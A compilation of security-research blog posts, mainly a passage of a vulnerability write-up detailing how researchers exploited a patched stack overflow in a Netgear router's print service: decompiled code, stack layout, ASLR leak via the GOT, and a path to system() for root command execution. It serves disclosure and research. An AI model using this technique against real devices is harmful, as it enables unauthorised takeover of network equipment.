Repair and reverse logistics also likely require privileged access to your embedded devices. Ensuring that this privilege cannot be abused requires strong authentication on the calibration and configuration interfaces, and a careful understanding of the nuances of the production process for your specific devices.

Summary

Early threat modeling and the development of security requirements doesn’t have to be a burden, and it can save a great deal of time and effort if done at the right time. Incorporating input from your security experts will help you make the right platform choices and avoid the churn associated with repeated security fixes. Early engagement is far more effective.

References

[1] https://www.ioxtalliance.org/the-pledge

[2] https://ogi-cdn.s3.us-east-2.amazonaws.com/csis/firmware-security-best-practices-v1.1.pdf

[3] https://www.nccgroup.com/uk/our-research/security-of-things-an-implementers-guide-to-cyber-security-for-internet-of-things-devices-and-beyond/

[4] https://www.nccgroup.com/uk/our-services/cyber-security/specialist-practices/secure-development-cycle/

[5] https://www.nccgroup.trust/us/our-research/secure-device-provisioning-best-practices-heavy-truck-edition/

[6] https://www.nccgroup.trust/uk/our-research/secure-device-manufacturing-supply-chain-security-resilience/


Rob Wood is the VP for the Hardware and Embedded Security Services practice at cybersecurity consultancy, NCC Group. His career in embedded devices spans two decades, having worked at both BlackBerry and Motorola Mobility in roles focused on embedded software development, product firmware and hardware security, and supply chain security. Rob is an experienced firmware developer with extensive security architecture experience. His specialty is in designing, building, and reviewing products to push the security boundaries deeper into the firmware, hardware, and supply chain. He is most comfortable working with the software layers deep in the bowels of the system, well below userland, where the lines between hardware and software begin to blur. This includes things like the bootloaders, kernel, device drivers, firmware, baseband, trusted execution environments, debug and development tools, factory and repair tools, bare-metal firmware, and all the processes that surround them.

Tags: Design MethodsSecurity

Conference Talks – March 2022

28 February 2022 at 08:30

This month, members of NCC Group will be presenting their work at the following conferences:

  • Juan Garrido, “Microsoft 365 APIs Edge Cases for Fun and Profit,” to be presented at RootedCon (March 10-12 2022)
  • Jennifer Fernick (NCC Group), Christopher Robinson (Intel), & Anne Bertucio (Google), “Preparing for Zero-Day: Vulnerability Disclosure in Open Source Software,” to be presented at FOSS Backstage (March 17-18 2022)
  • Alma Rinasz, “You Got This: Stories of Career Pivots and How You Can Successfully Start Your Cyber Career,” to be presented at WiCys 2022 (March 17-19 2022)
  • James Chambers , “Reversing the Pokémon Snap Station without a Snap Station”, to be presented at ShmooCon (March 24-26 2022)

Please join us!

Microsoft 365 APIs Edge Cases for Fun and Profit
Juan Garrido
RootedCon
March 17-18 2022

Madrid, Spain

In this talk we describe and demonstrate multiple techniques for circumventing existing Microsoft 365 application security controls and how data can be exfiltrated from highly secure Microsoft 365 tenants which employ strict security policies.

That is, Microsoft 365 tenants with application policies to restrict access to a range of predefined IP addresses or subnets, or configured with Conditional Access Policies, which are used to control access to cloud applications. Assuming a Microsoft 365 configuration has enforced these types of security policy, we show how it can be possible to bypass these security features and exfiltrate information from multiple Microsoft 365 applications, such as OneDrive for Business, SharePoint Online, Yammer or even Exchange Online.


Preparing for Zero-Day: Vulnerability Disclosure in Open Source Software
Jennifer Fernick (NCC Group), Christopher Robinson (Intel), & Anne Bertucio (Google)
FOSS Backstage
March 17-18 2022

Berlin, Germany + Virtual

Open source software is incredibly powerful – and while that power is often used for good, it can be weaponized when open-source projects contain software security flaws that attackers can use to compromise those systems, or even the entire software supply chains that those systems are a part of. The Open Source Security Foundation is an open, cross-industry group aimed at improving the security of the open source ecosystem. In this presentation, members of the OpenSSF Vulnerability Disclosure working group will be sharing with open-source maintainers advice on how to handle when researchers disclose vulnerabilities in your project’s codebase – and we’ll also take any questions you have about this often mysterious topic! 

Part 1 of this presentation will give an overview of the basics of Coordinated Vulnerability Disclosure (CVD) for open-source software maintainers, including some basics about security vulnerabilities, how to communicate securely and write patches without leaking vulnerability information, what you can expect during a disclosure with a researcher, and how to handle challenging scenarios like when you can’t patch, when a vulnerability is already being exploited by a threat actor in the wild, or when a vulnerability impacts many downstream dependencies.

Part 2 of this presentation will include a discussion about vulnerability disclosure best practices, pitfalls, and challenges. We will also welcome questions from the audience – ask us anything about dealing with vulnerabilities in open source!


You Got This: Stories of Career Pivots and How You Can Successfully Start Your Cyber Career
Alma Rinasz (NCC Group), Meghan Jacquot (Recorded Future), Jennifer Cheung (WiCyS), Jennifer Bate (Deloitte), Ashley S.Richardson (Palo Alto Networks)
WiCys Conference 2022
March 17-19 2022

Cleveland, OH

A panel of four women, none started in cybersecurity, and all have successfully pivoted to the industry, will be moderated by another cybersecurity professional who also has her own story to share, she had a long career gap and then returned to cybersecurity. Emphasis and care were given to put together a diverse panel with a variety of backgrounds, experiences, and also a belief in #ShareTheMic. Two panelists are veterans and two panelists are BIPOC. Each panelist has her own story, but there are common threads of collaboration, curiosity, and determination. Questions will be carefully crafted in order to deliver a nuanced perspective to the audience. The hope is that the conference attendees have takeaways regarding representation (they can see themselves in the panel) as well as concrete ideas for how to pivot (if applicable), start in cyber, and be successful in the industry. The panel will end with time for a question and answer session this way attendees will have time for any questions they might have as well as the ability to network and get to know the panelists more. All panelists are involved in WiCySand encouraging women in tech and women in cybersecurity, so part of the focus of the panel will be to encourage the attendees that they too can be successful wherever they are in their journey. You’ve got this!


Reversing the Pokémon Snap Station without a Snap Station
James Chambers 
ShmooCon
March 24-26 2022
Washington, DC

Back in 1999 when the original Pokémon Snap was released for Nintendo 64, one of its coolest features was that you could head to a local Blockbuster and use a “Snap Station” to print out stickers of the photos you took in-game. Snap Stations are now rare collector’s items that few have access to, rendering the printing feature inaccessible.

Learning that they consisted of a Nintendo 64 console hooked up to a printer via video cables and a controller port, I set out to reverse engineer Pokémon Snap to see if I could restore the print functionality without access to the original kiosk hardware. This project involved a combination of software and hardware reverse engineering, facilitated by using an FPGA to make a physical link interface for Nintendo’s proprietary Joy Bus protocol. The resulting FPGA- based tool can also be used to simulate and interface with other peripherals, such as the Transfer Pak accessory which can be used to dump Game Boy cartridge data.

This presentation will demonstrate the reverse engineering and tooling processes, including tips on how hackers with a software background can go from following basic FPGA tutorials to creating real world hardware hacking tools.

BrokenPrint: A Netgear stack overflow

28 February 2022 at 12:43

Summary

This blog post describes a stack-based overflow vulnerability found and exploited in September 2021 by Alex Plaskett, Cedric Halbronn and Aaron Adams working at the Exploit Development Group (EDG) of NCC Group. The vulnerability was patched within the firmware update contained within the following Netgear advisory.

The vulnerability is in the KC_PRINT service (/usr/bin/KC_PRINT), running by default on the Netgear R6700v3 router. Although it is a default service, the vulnerability is only reachable if the ReadySHARE feature is turned on, which means a printer is physically connected to the Netgear router through an USB port. No configuration is needed to be made, so the default configuration is exploitable as soon as a printer is connected to the router.

This vulnerability can be exploited on the LAN side of the router and does not need authentication. It allows an attacker to get remote code execution as the admin user (highest privileges) on the router.

Our exploitation method is very similar to what was used in the Tokyo Drift paper i.e. we chose to change the admin password and start utelnetd service, which allowed us to then get a privileged shell on the router.

We have analysed and exploited the vulnerability on the V1.0.4.118_10.0.90 version, which we detail below, but older versions are likely vulnerable too.

Note: The Netgear R6700v3 router is based on the ARM (32-bit) architecture.

We have named our exploit "BrokenPrint". This is because "KC" is pronounced like "cassé" in French which means "broken" in English.

Vulnerability details

Background on ReadySHARE

This video explains well what ReadySHARE is, but it basically allows to access a USB printer through the Netgear router as if the printer were a network printer.

Reaching the vulnerable memcpy()

The KC_PRINT binary does not have symbols but has a lot of logging/error functions which contain some function names. The code shown below is decompiled code from IDA/Hex-Rays as no open source has been found for this binary.

The KC_PRINT binary creates lots of threads to handle different features:

The first thread handler we are interested in is ipp_server() at address 0xA174. We see it listens on port 631, and when it accepts a client connection, it creates a new thread handled by thread_handle_client_connection() at address 0xA4B4 and passes the client socket to this new thread.

void __noreturn ipp_server()
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  addr_len = 0x10;
  optval = 1;
  kc_client = 0;
  pthread_attr_init(&attr);
  pthread_attr_setdetachstate(&attr, 1);
  sock = socket(AF_INET, SOCK_STREAM, 0);
  if ( sock < 0 )
  {
    ...
  }
  if ( setsockopt(sock, 1, SO_REUSEADDR, &optval, 4u) < 0 )
  {
    ...
  }
  memset(&sin, 0, sizeof(sin));
  sin.sin_family = 2;
  sin.sin_addr.s_addr = htonl(0);
  sin.sin_port = htons(631u);                   // listens on TCP 631
  if ( bind(sock, (const struct sockaddr *)&sin, 0x10u) < 0 )
  {
    ...
  }

  // accept up to 128 clients simultaneously
  listen(sock, 128);
  while ( g_enabled )
  {
    client_sock = accept(sock, &addr, &addr_len);
    if ( client_sock >= 0 )
    {
      update_count_client_connected(CLIENT_CONNECTED);
      val[0] = 60;
      val[1] = 0;
      if ( setsockopt(client_sock, 1, SO_RCVTIMEO, val, 8u) < 0 )
        perror("ipp_server: setsockopt SO_RCVTIMEO failed");
      kc_client = (kc_client *)malloc(sizeof(kc_client));
      if ( kc_client )
      {
        memset(kc_client, 0, sizeof(kc_client));
        kc_client->client_sock = client_sock;
        pthread_mutex_lock(&g_mutex);
        thread_index = get_available_client_thread_index();
        if ( thread_index < 0 )
        {
          pthread_mutex_unlock(&g_mutex);
          free(kc_client);
          kc_client = 0;
          close(client_sock);
          update_count_client_connected(CLIENT_DISCONNECTED);
        }
        else if ( pthread_create(
                    &g_client_threads[thread_index],
                    &attr,
                    (void *(*)(void *))thread_handle_client_connection,
                    kc_client) )
        {
          ...
        }
        else
        {
          pthread_mutex_unlock(&g_mutex);
        }
      }
      else
      {
        ...
      }
    }
  }
  close(sock);
  pthread_attr_destroy(&attr);
  pthread_exit(0);
}

The client handler calls into do_http at address 0xA530:

void __fastcall __noreturn thread_handle_client_connection(kc_client *kc_client)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  client_sock = kc_client->client_sock;
  while ( g_enabled && !do_http(kc_client) )
    ;
  close(client_sock);
  update_count_client_connected(CLIENT_DISCONNECTED);
  free(kc_client);
  pthread_exit(0);
}

The do_http() function reads a HTTP-like request until it finds the end of the HTTP headers \r\n\r\n into a 1024-byte stack buffer. It then searches for a POST /USB URI and an _LQ string where usblp_index is an integer. It then calls into is_printer_connected() at 0x16150.

The is_printer_connected() won’t be shown for brevity but all it does is open the /proc/printer_status file, tries to read its content and tries to find an USB port by looking for a string like usblp%d. This will only be found if a printer is connected to the Netgear router, meaning it will never continue further if no printer is connected.

unsigned int __fastcall do_http(kc_client *kc_client)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  kc_client_ = kc_client;
  client_sock = kc_client->client_sock;
  content_len = 0xFFFFFFFF;
  strcpy(http_continue, "HTTP/1.1 100 Continue\r\n\r\n");
  pCurrent = 0;
  pUnderscoreLQ_or_CRCL = 0;
  p_client_data = 0;
  kc_job = 0;
  strcpy(aborted_by_system, "aborted-by-system");
  remaining_len = 0;
  kc_chunk = 0;

  // buf_read is on the stack and is 1024 bytes
  memset(buf_read, 0, sizeof(buf_read));

  // Read in 1024 bytes maximum
  count_read = readUntil_0d0a_x2(client_sock, (unsigned __int8 *)buf_read, 0x400);
  if ( (int)count_read <= 0 )
    return 0xFFFFFFFF;

  // if received "100-continue", sends back "HTTP/1.1 100 Continue\r\n\r\n"
  if ( strstr(buf_read, "100-continue") )
  {
    ret_1 = send(client_sock, http_continue, 0x19u, 0);
    if ( ret_1 <= 0 )
    {
      perror("do_http() write 100 Continue xx");
      return 0xFFFFFFFF;
    }
  }

  // If POST /USB is found
  pCurrent = strstr(buf_read, "POST /USB");
  if ( !pCurrent )
    return 0xFFFFFFFF;
  pCurrent += 9;                                // points after "POST /USB"

  // If _LQ is found
  pUnderscoreLQ_or_CRCL = strstr(pCurrent, "_LQ");
  if ( !pUnderscoreLQ_or_CRCL )
    return 0xFFFFFFFF;
  Underscore = *pUnderscoreLQ_or_CRCL;
  *pUnderscoreLQ_or_CRCL = 0;
  usblp_index = atoi(pCurrent);                 
  *pUnderscoreLQ_or_CRCL = Underscore;
  if ( usblp_index > 10 )                    
    return 0xFFFFFFFF;

  // by default, will exit here as no printer connected
  if ( !is_printer_connected(usblp_index) )
    return 0xFFFFFFFF;                          // exit if no printer connected

  kc_client_->usblp_index = usblp_index;

It then parses the HTTP Content-Length header and starts by reading 8 bytes from the HTTP content. Depending on values of these 8 bytes, it calls into do_airippWithContentLength() at 0x128C0 which is the one we are interested in.

  // /!\ does not read from pCurrent
  pCurrent = strstr(buf_read, "Content-Length: ");
  if ( !pCurrent )
  {
    // Handle chunked HTTP encoding
    ...
  }

  // no chunk encoding here, normal http request
  pCurrent += 0x10;
  pUnderscoreLQ_or_CRCL = strstr(pCurrent, "\r\n");
  if ( !pUnderscoreLQ_or_CRCL )
    return 0xFFFFFFFF;
  Underscore = *pUnderscoreLQ_or_CRCL;
  *pUnderscoreLQ_or_CRCL = 0;
  content_len = atoi(pCurrent);
  *pUnderscoreLQ_or_CRCL = Underscore;
  memset(recv_buf, 0, sizeof(recv_buf));
  count_read = recv(client_sock, recv_buf, 8u, 0);// 8 bytes are read only initially
  if ( count_read != 8 )
    return 0xFFFFFFFF;
  if ( (recv_buf[2] || recv_buf[3] != 2) && (recv_buf[2] || recv_buf[3] != 6) )
  {
    ret_1 = do_airippWithContentLength(kc_client_, content_len, recv_buf);
    if ( ret_1 < 0 )
      return 0xFFFFFFFF;
    return 0;
  }
  ...

The do_airippWithContentLength() function allocates a heap buffer to hold the entire HTTP content, copy the previously 8 bytes already read and reads the remaining bytes into that new heap buffer.

Note: there is no limit on the actual HTTP content size as long as malloc() does not fail due to insufficient memory, which will be useful later to spray memory.

Then, still depending on the values of the 8 bytes initially read, it calls into additional functions. We are interested in the Response_Get_Jobs() at 0x102C4 which contains the stack-based overflow we are going to exploit. Note that other Response_XXX() functions contain similar stack overflows but it seems Response_Get_Jobs() was the most straight forward to exploit, so we targeted this function.

unsigned int __fastcall do_airippWithContentLength(kc_client *kc_client, int content_len, char *recv_buf_initial)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  client_sock = kc_client->client_sock;
  recv_buf2 = malloc(content_len);
  if ( !recv_buf2 )
    return 0xFFFFFFFF;
  memcpy(recv_buf2, recv_buf_initial, 8u);
  if ( toRead(client_sock, recv_buf2 + 8, content_len - 8) >= 0 )
  {
    if ( recv_buf2[2] || recv_buf2[3] != 0xB )
    {
      if ( recv_buf2[2] || recv_buf2[3] != 4 )
      {
        if ( recv_buf2[2] || recv_buf2[3] != 8 )
        {
          if ( recv_buf2[2] || recv_buf2[3] != 9 )
          {
            if ( recv_buf2[2] || recv_buf2[3] != 0xA )
            {
              if ( recv_buf2[2] || recv_buf2[3] != 5 )
                Job = Response_Unk_1(kc_client, recv_buf2);
              else
                // recv_buf2[3] == 0x5
                Job = Response_Create_Job(kc_client, recv_buf2, content_len);
            }
            else
            {
              // recv_buf2[3] == 0xA
              Job = Response_Get_Jobs(kc_client, recv_buf2, content_len);
            }
          }
          else
          {
            ...
}

The first part of the vulnerable Response_Get_Jobs() function code is shown below:

// recv_buf was allocated on the heap
unsigned int __fastcall Response_Get_Jobs(kc_client *kc_client, unsigned __int8 *recv_buf, int content_len)
{
  char command[64]; // [sp+24h] [bp-1090h] BYREF
  char suffix_data[2048]; // [sp+64h] [bp-1050h] BYREF
  char job_data[2048]; // [sp+864h] [bp-850h] BYREF
  unsigned int error; // [sp+1064h] [bp-50h]
  size_t copy_len; // [sp+1068h] [bp-4Ch]
  int copy_len_1; // [sp+106Ch] [bp-48h]
  size_t copied_len; // [sp+1070h] [bp-44h]
  size_t prefix_size; // [sp+1074h] [bp-40h]
  int in_offset; // [sp+1078h] [bp-3Ch]
  char *prefix_ptr; // [sp+107Ch] [bp-38h]
  int usblp_index; // [sp+1080h] [bp-34h]
  int client_sock; // [sp+1084h] [bp-30h]
  kc_client *kc_client_1; // [sp+1088h] [bp-2Ch]
  int offset_job; // [sp+108Ch] [bp-28h]
  char bReadAllJobs; // [sp+1093h] [bp-21h]
  char is_job_media_sheets_completed; // [sp+1094h] [bp-20h]
  char is_job_state_reasons; // [sp+1095h] [bp-1Fh]
  char is_job_state; // [sp+1096h] [bp-1Eh]
  char is_job_originating_user_name; // [sp+1097h] [bp-1Dh]
  char is_job_name; // [sp+1098h] [bp-1Ch]
  char is_job_id; // [sp+1099h] [bp-1Bh]
  char suffix_copy1_done; // [sp+109Ah] [bp-1Ah]
  char flag2; // [sp+109Bh] [bp-19h]
  size_t final_size; // [sp+109Ch] [bp-18h]
  int offset; // [sp+10A0h] [bp-14h]
  size_t response_len; // [sp+10A4h] [bp-10h]
  char *final_ptr; // [sp+10A8h] [bp-Ch]
  size_t suffix_offset; // [sp+10ACh] [bp-8h]

  kc_client_1 = kc_client;
  client_sock = kc_client->client_sock;
  usblp_index = kc_client->usblp_index;
  suffix_offset = 0;                            // offset in the suffix_data[] stack buffer
  in_offset = 0;
  final_ptr = 0;
  response_len = 0;
  offset = 0;                                   // offset in the client data "recv_buf" array
  final_size = 0;
  flag2 = 0;
  suffix_copy1_done = 0;
  is_job_id = 0;
  is_job_name = 0;
  is_job_originating_user_name = 0;
  is_job_state = 0;
  is_job_state_reasons = 0;
  is_job_media_sheets_completed = 0;
  bReadAllJobs = 0;

  // prefix_data is a heap allocated buffer to copy some bytes
  // from the client input but is not super useful from an
  // exploitation point of view
  prefix_size = 74;                             // size of prefix_ptr[] heap buffer
  prefix_ptr = (char *)malloc(74u);
  if ( !prefix_ptr )
  {
    perror("Response_Get_Jobs: malloc xx");
    return 0xFFFFFFFF;
  }
  memset(prefix_ptr, 0, prefix_size);

  // copy bytes indexes 0 and 1 from client data
  copied_len = memcpy_at_index(prefix_ptr, in_offset, &recv_buf[offset], 2u);
  in_offset += copied_len;

  // we make sure to avoid this condition to be validated
  // so we keep bReadAllJobs == 0
  if ( *recv_buf == 1 && !recv_buf[1] )
    bReadAllJobs = 1;
  offset += 2;

  // set prefix_data's bytes index 2 and 3 to 0x00
  prefix_ptr[in_offset++] = 0;
  prefix_ptr[in_offset++] = 0;
  offset += 2;

  // copy bytes indexes 4,5,6,7 from client data
  in_offset += memcpy_at_index(prefix_ptr, in_offset, &recv_buf[offset], 4u);
  offset += 4;
  copy_len_1 = 0x42;

  // copy bytes indexes [8,74] from table keywords
  copied_len = memcpy_at_index(prefix_ptr, in_offset, &table_keywords, 0x42u);
  in_offset += copied_len;
  ++offset;                                     // offset = 9 after this

  // job_data[] and suffix_data[] are 2 stack buffers to copy some bytes
  // from the client input but are not super useful from an
  // exploitation point of view
  memset(job_data, 0, sizeof(job_data));
  memset(suffix_data, 0, sizeof(suffix_data));
  suffix_data[suffix_offset++] = 5;

  // we need to enter this to trigger the stack overflow
  if ( !bReadAllJobs )
  {
    // iteration 1: offset == 9
    // NOTE: we make sure to overwrite the "offset" local variable
    // to be content_len+1 when overflowing the stack buffer to exit this loop after the 1st iteration
    while ( recv_buf[offset] != 3 && offset <= content_len )
    {
      // we make sure to enter this as we need flag2 != 0 later
      // to trigger the stack overflow
      if ( recv_buf[offset] == 0x44 && !flag2 )
      {
        flag2 = 1;
        suffix_data[suffix_offset++] = 0x44;

        // we can set a copy_len == 0 to simplify this
        // offset = 9 here
        copy_len = (recv_buf[offset + 1] << 8) + recv_buf[offset + 2];
        copied_len = memcpy_at_index(suffix_data, suffix_offset, &recv_buf[offset + 1], copy_len + 2);
        suffix_offset += copied_len;
      }
      ++offset;                                 // iteration 1: offset = 10 after this


      // this is the same copy_len as above but just used to skip bytes here
      // offset = 10 here
      copy_len = (recv_buf[offset] << 8) + recv_buf[offset + 1];
      offset += 2 + copy_len;                   // we can set a copy_len == 0 to simplify this
                                                // iteration 1: offset = 12 after this

      // again, copy_len is pulled from client controlled data,
      // this time used in a copy onto a stack buffer
      // copy_len equals maximum: 0xff00 + 0xff
      // and a copy is made into command[] which is a 2048-byte buffer
      copy_len = (recv_buf[offset] << 8) + recv_buf[offset + 1];
      offset += 2;                              // iteration 1: offset = 14 after this

      // we need flag2 == 1 to enter this
      if ( flag2 )
      {
        // /!\ VULNERABILITY HERE /!\
        memset(command, 0, sizeof(command));
        memcpy(command, &recv_buf[offset], copy_len);// VULN: stack overflow here
        ...

It first starts by allocating a prefix_ptr heap buffer to hold a few bytes from the client data. Depending on client data bytes 0 and 1, it may set bReadAllJobs = 1 which we want to avoid in order to reach the vulnerable memcpy(), so we make sure bReadAllJobs = 0 remains.

Above we see 2 memset() for 2 stack buffers that we named job_data and suffix_data. We then enter the if ( !bReadAllJobs ). We craft client data to we make sure to validate the while ( recv_buf[offset] != 3 && offset <= content_len ) condition to enter the loop.

We also need to set flag2 = 1 so we make sure to validate the conditions on the client data to enter the if ( recv_buf[offset] == 0x44 && !flag2 ) condition.

Later inside the while loop if flag2 is set, then a 16-bit size (maximum is 0xffff = 65535 bytes) is read from the client data in copy_len = (recv_buf[offset] << 8) + recv_buf[offset + 1];. Then, this size is used as the argument to memcpy when copying into a 64-byte stack buffer in memcpy(command, &recv_buf[offset], copy_len). This is a stack-based overflow vulnerability where we control the overflowing size and content. There is no limitation on the values of the bytes to use for overflowing, which makes it a very nice vulnerability to exploit at first sight.

Since there is no stack cookie, the strategy to exploit this stack overflow is to overwrite the saved return address on the stack and continue execution until the end of the function to get $pc control.

Reaching the end of the function

It is now important to look at the stack layout from the command[] array we are overflowing from. As can be seen below, command[] is the local variable that is furthest away from the return address. This has the advantage of allowing us to control any of the local variable’s values post-overflow. Remember that we are in the while loop at the moment so the initial idea would be to get out of this loop as soon as possible. By overwriting local variables and setting them to appropriate values, this should be easy.

-00001090 command         DCB 64 dup(?)
-00001050 suffix_data     DCB 2048 dup(?)
-00000850 job_data        DCB 2048 dup(?)
-00000050 error           DCD ?
-0000004C copy_len        DCD ?
-00000048 copy_len_1      DCD ?
-00000044 copied_len      DCD ?
-00000040 prefix_size     DCD ?
-0000003C in_offset       DCD ?
-00000038 prefix_ptr      DCD ?                   ; offset
-00000034 usblp_index     DCD ?
-00000030 client_sock     DCD ?
-0000002C kc_client_1     DCD ?
-00000028 offset_job      DCD ?
-00000024                 DCB ? ; undefined
-00000023                 DCB ? ; undefined
-00000022                 DCB ? ; undefined
-00000021 bReadAllJobs    DCB ?
-00000020 is_job_media_sheets_completed DCB ?
-0000001F is_job_state_reasons DCB ?
-0000001E is_job_state    DCB ?
-0000001D is_job_originating_user_name DCB ?
-0000001C is_job_name     DCB ?
-0000001B is_job_id       DCB ?
-0000001A suffix_copy1_done DCB ?
-00000019 flag2           DCB ?
-00000018 final_size      DCD ?
-00000014 offset          DCD ?
-00000010 response_len    DCD ?
-0000000C final_ptr       DCD ?                   ; offset
-00000008 suffix_offset   DCD ?

So after our overflowing memcpy(), we decide to set client data to hold the "job-id" command to simplify code paths being taken. Then we see the offset += copy_len statement. Since we control both copy_len and offset values due to our overflow, we can craft values to make us exit from the loop condition: while ( recv_buf[offset] != 3 && offset <= content_len ) by setting offset = content_len+1 for instance.

Next we are executing the 2nd read_job_value() call due to bReadAllJobs == 0. The read_job_value() is not relevant for us but its purpose is to loop on all the printer’s jobs and save the requested data (in our case it would be the job-id). In our case, we assume there is no printer’s job at the moment so nothing will be read. This means the offset_job being returned is 0.

  // we need to enter this to trigger the stack overflow
  if ( !bReadAllJobs )
  {
    // iteration 1: offset == 9
    // NOTE: we make sure to overwrite the "offset" local variable
    // to be content_len+1 when overflowing the stack buffer to exit this loop after the 1st iteration
    while ( recv_buf[offset] != 3 && offset <= content_len )
    {
      ...
      // we need flag2 == 1 to enter this
      if ( flag2 )
      {
        // /!\ VULNERABILITY HERE /!\
        memset(command, 0, sizeof(command));
        memcpy(command, &recv_buf[offset], copy_len);// VULN: stack overflow here

        // dispatch to right command 
        if ( !strcmp(command, "job-media-sheets-completed") )
        {
          is_job_media_sheets_completed = 1;
        }
        ...
        else if ( !strcmp(command, "job-id") )
        {
          // atm we make sure to send a "job-id\0" command to go here
          is_job_id = 1;
        }
        else
        {
          ...
        }
      }
      offset += copy_len;                       // this is executed before looping
    }
  }                                             // end of while loop

  final_size += prefix_size;
  if ( bReadAllJobs )
    offset_job = read_job_value(usblp_index, 1, 1, 1, 1, 1, 1, job_data);
  else
    offset_job = read_job_value(
                   usblp_index,
                   is_job_id,
                   is_job_name,
                   is_job_originating_user_name,
                   is_job_state,
                   is_job_state_reasons,
                   is_job_media_sheets_completed,
                   job_data);

Now, we continue to look at the vulnerable function code below. Since offset_job = 0, the first if clause is skipped (Note: skipped for now as there is a label that we will jump to later, hence why we kept it in the code below).

Then, a heap buffer to hold a response is allocated and saved in final_ptr. Then, data is copied from the prefix_ptr buffer mentioned at the beginning of the vulnerable function. Finally, it jumps to the b_write_ipp_response2 label where write_ipp_response() at 0x13210 is called. write_ipp_response() won’t be shown for brevity but its purpose is to send an HTTP response to the client socket.

Finally, the 2 heap buffers pointed by prefix_ptr and final_ptr are freed and the function exits.

  // offset_job is an offset inside job_data[] stack buffer
  // atm we assume offset_job == 0 so we skip this condition.
  // Note we assume that due to no printing job currently existing
  // but it would be better to actually make sure all the is_xxx variables == 0 as explained above
  if ( offset_job > 0 )                         // assumed skipped for now
  {
    ...
b_write_ipp_response2:
    final_ptr[response_len++] = 3;
    // the "client_sock" is a local variable that we overwrite
    // when trying to reach the stack address. We need to brute
    // force the socket value in order to effectively send
    // us our leaked data if we really want that data back but
    // otherwise the send() will silently fail
    error = write_ipp_response(client_sock, final_ptr, response_len);

    // From testing, it is safe to use the starting .got address for the prefix_ptr 
    // and free() will ignore that address hehe
    // XXX - not sure why but if I use memset_ptr (offset inside
    //       the .got), it crashes on free() though lol
    if ( prefix_ptr )
    {
      free(prefix_ptr);
      prefix_ptr = 0;
    }

    // Freeing the final_ptr is no problem for us
    if ( final_ptr )
    {
      free(final_ptr);
      final_ptr = 0;
    }

    // this is where we get $pc control
    if ( error )
      return 0xFFFFFFFF;
    else
      return 0;
  }

  // we reach here if no job data
  final_ptr = (char *)malloc(++final_size);
  if ( final_ptr )
  {
    // prefix_ptr is a heap buffer that was allocated at the
    // beginning of this function but pointer is stored in a
    // stack variable. We actually need to corrupt this pointer
    // as part of the stack overflow to reach the return address
    // which means we can leak make it copy any size from any
    // address which results in our leak primitive
    memset(final_ptr, 0, final_size);
    copied_len = memcpy_at_index(final_ptr, response_len, prefix_ptr, prefix_size);
    response_len += copied_len;
    goto b_write_ipp_response2;
  }

  // error below / never reached
  ...
}

Exploitation

Mitigations in place

Our goal is to overwrite the return address to get $pc control but there are a few challenges here. We need to know what static addresses we can use.

Checking the ASLR settings of the kernel:

# cat /proc/sys/kernel/randomize_va_space
1

From here:

  • 0 – Disable ASLR. This setting is applied if the kernel is booted with the norandmaps boot parameter.
  • 1 – Randomize the positions of the stack, virtual dynamic shared object (VDSO) page, and shared memory regions. The base address of the data segment is located immediately after the end of the executable code segment.
  • 2 – Randomize the positions of the stack, VDSO page, shared memory regions, and the data segment. This is the default setting.

Checking the mitigations of the KC_PRINT binary using checksec.py:

[*] '/home/cedric/test/firmware/netgear_r6700/_R6700v3-
V1.0.4.118_10.0.90.zip.extracted/
_R6700v3-V1.0.4.118_10.0.90.chk.extracted/squashfs-root/usr/bin/KC_PRINT'
    Arch:     arm-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8000)

So to summarize:

  • KC_PRINT: not randomized
    • .text: read/execute
    • .data: read/write
  • Libraries: randomized
  • Heap: not randomized
  • Stack: randomized

Building a leak primitive

If we go back to the previous decompiled code we discussed, there are a few things to point out:

final_ptr = (char *)malloc(++final_size);
copied_len = memcpy_at_index(final_ptr, response_len, prefix_ptr, prefix_size);
error = write_ipp_response(client_sock, final_ptr, response_len);

The first one is that in order to overwrite the return address we first need to overwrite prefix_ptr, prefix_size and client_sock.

prefix_ptr needs to be a valid address and this address will be used to copy prefix_size bytes from it into final_ptr. Then that data will be sent back to the client socket assuming client_sock is a valid socket.

This looks like a good leak primitive since we control both prefix_ptr and prefix_size, however we still need to know our previously valid client_sock to get the data back.

However, what if we overwrite the whole stack frame containing all the local variables except we don’t overwrite the saved registers and the return address? Well it will proceed to send us data back and will exit the function as if no overflow happened. This is perfect as it allows us to brute force the client_sock value.

Moreover, by testing multiple times, we noticed that if we are the only client connecting to KC_PRINT the client_sock could be different among KC_PRINT executions. However, once KC_PRINT is started, it will keep allocating the same client_sock for every connection as long as we closed the previous connection.

This is a perfect scenario for us since it means we can initially bruteforce the socket value by overflowing the entire stack frame (except the saved register and return value) until we get an HTTP response, and KC_PRINT will never crashes. Once we know that socket value, we can start leaking data. But where to point prefix_ptr to?

Bypassing ASLR and achieving command execution

Here, there is another challenge to solve. Indeed, at the end of Response_Get_Jobs there is a call to free(prefix_ptr); before we can control $pc. So initially we thought we would need to know a valid heap address that is valid for free().

However after testing in the debugger, we noticed that passing the Global Offset Table (GOT) address to the free() call went through without crashing. We are not sure why as we didn’t investigate for time reasons. However, this opens new opportunities. Indeed, the .got is at a static address due to KC_PRINT being compiled without PIE support. It means we can leak an imported function like memset() which is in libc.so. Then we can deduce the libc.so base address and effectively bypass the ASLR in place for libraries. We can then deduce the system() address.

Our end goal is to call system() on an arbitrary string to execute a shell command. But where to store our data? Initially we thought we could use the data on the stack but the stack is randomized so we can’t hardcode an address in our data. We could use a complicated ROP chain to build the command string to execute, but it seemed over-complicated to do in ARM (32-bit) due to ARM 32-bit alignment of instructions which makes using non-aligned instructions impossible. We also thought about changing the ARM mode to Thumb mode. But is there an even easier method?

What if we could allocate controlled data at a specific address? Then we remembered the excellent blog from Project Zero which mentioned mmap() randomization was broken on 32-bit. And in our case, we know the heap is not randomized, so what about big allocations? It turns out they are randomized but not so well.

